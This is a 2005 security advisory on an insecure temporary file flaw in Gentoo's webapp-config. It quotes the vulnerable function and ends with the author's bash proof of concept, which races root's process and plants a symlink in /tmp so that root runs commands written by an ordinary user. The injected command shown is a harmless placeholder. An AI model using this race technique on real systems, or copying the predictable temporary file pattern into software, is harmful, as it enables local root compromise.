webapp-config-05182005.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
#########################################################  
  
Gentoo webapp-config insecure temporary file creation  
  
Vendor: http://www.gentoo.org  
Advisory: http://www.zataz.net/adviso/webapp-config-05182005.txt  
Vendor informed: yes  
Exploit available: yes  
Impact : high  
Exploitation : low  
  
#########################################################  
  
Gentoo webapp-config contain a security flaw wich could allow a  
malicious local user to execute command with root privileges.  
  
The vulnerability is due to an insecure temporary file creation.  
  
The exploitation require that the root user install, upgrade or delete  
Gentoo provided web application with the webapp-config tool.  
  
##########  
Versions:  
##########  
  
webapp-config < 1.10-r14  
  
##########  
Solution:  
##########  
  
Upgrade to net-www/webapp-config 1.10-r14  
  
#########  
Timeline:  
#########  
  
Discovered : 2005-05-07  
Vendor notified : 2005-05-07  
Vendor response : 2005-05-07  
Vendor fix : 2005-05-08  
Disclosure :  
  
#####################  
Technical details :  
#####################  
  
Vulnerable code :  
- -----------------  
  
Begin line 2711  
  
fn_show_postinst ()  
{  
if [ ! -f "${MY_APPDIR}/postinst-en.txt" ]; then  
return  
fi  
  
local my_file="/tmp/$$.postinst.txt"  
  
fn_run_vars  
  
# we create a temporary file, so that we can expand the   
variables  
# that are used in the file  
  
echo "cat <<webapp-EOF" > "$my_file"  
cat "${MY_APPDIR}/postinst-en.txt" >> "$my_file"  
echo "webapp-EOF" >> "$my_file"  
  
# execute the temporary file, to generate the output  
  
echo  
. "$my_file"  
echo  
  
# it's a temporary file, so let's get rid of it now  
  
rm -f "$my_file"  
}  
  
#####  
POC :  
#####  
  
http://www.zataz.net/dev/webapp-poc.sh.txt  
  
#########  
Related :  
#########  
  
Bug report : https://bugs.gentoo.org/show_bug.cgi?id=91785  
GLSA : Waiting for it  
  
#####################  
Credits :  
#####################  
  
Eric Romang ([email protected] - ZATAZ Audit)  
Thxs to Gentoo Security Team. (Taviso, jaervosz, solar, etc.)  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.1 (Darwin)  
  
iD8DBQFCkF9vXXuxWE8lDAcRAjSjAJ0e4O5D5H2CDWOBex+Aay2BCYVznwCfci+7  
KGXba0qvTu5b20ABcBkABKQ=  
=7wI3  
-----END PGP SIGNATURE-----  
  
  
  
  
#!/bin/bash  
  
# Eric Romang aka wow ([email protected])  
# webapp-config race condition how permit execution of arbitrary command with root privileges  
# work with < webapp-config 1.10-r14  
  
rm -f webapp-config_trace.txt fake_tmp_file /tmp/*.postinst.txt  
touch ~/fake_tmp_file  
  
echo "0" > webapp-config_trace.txt  
status=`cat webapp-config_trace.txt`  
echo "Waiting for webapp-config execution..."  
  
while [ "$status" == 0 ]  
do  
ps auxw|grep webapp-config|grep root   
if [ "$?" == 0 ]  
then  
echo "1" > webapp-config_trace.txt  
fi  
status=`cat webapp-config_trace.txt`  
done  
  
echo "Process caught !"  
process_id=`pgrep -u root webapp-config`  
ln -s ~/fake_tmp_file /tmp/$process_id.postinst.txt  
echo "fake_file_created!"  
echo "we force the file to be overwritten"  
  
echo "0" > webapp-config_trace.txt  
status=`cat webapp-config_trace.txt`  
echo "Waiting the end of webapp-config"  
echo "during all the configuration we force the file to be overwritten"  
while [ "$status" == 0 ]  
do  
ps auxw|grep webapp-config|grep root  
if [ "$?" == 1 ]  
then  
echo "1" > webapp-config_trace.txt  
else  
echo "echo premature end of script; exit 1;" > ~/fake_tmp_file  
fi  
status=`cat webapp-config_trace.txt`  
done  
echo "end of webapp-config"  
  
`